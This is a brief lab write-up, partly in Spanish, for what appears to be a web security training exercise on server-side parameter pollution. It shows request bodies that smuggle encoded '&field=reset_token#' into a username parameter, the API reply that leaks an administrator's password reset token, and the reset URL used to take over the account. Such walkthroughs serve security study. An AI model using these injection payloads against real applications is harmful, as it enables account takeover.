01 Lab: Exploiting server-side parameter pollution in a query string
Objetivo
To solve the lab, log in as the
administratorand deletecarlos.
Solución
La respuesta Field not specified indica que hay campos que no se han llenado. Es decir con el %23 o con el # se ha forzado un error típico de apis
csrf=ieYJUI1Y4oYGwE0D8Ht5bpZAfUEZJ68E&username=administrator%26field=sdada%23
el %26 es url ecoded de &
el %23 es url ecoded de #
csrf=ieYJUI1Y4oYGwE0D8Ht5bpZAfUEZJ68E&username=administrator%26field=reset_token%23
{"type":"reset_token","result":"ojj4fu8g9bjvu3itnvwj6sudt21e3a47"}
/forgot-password?reset_token=ojj4fu8g9bjvu3itnvwj6sudt21e3a47
Last updated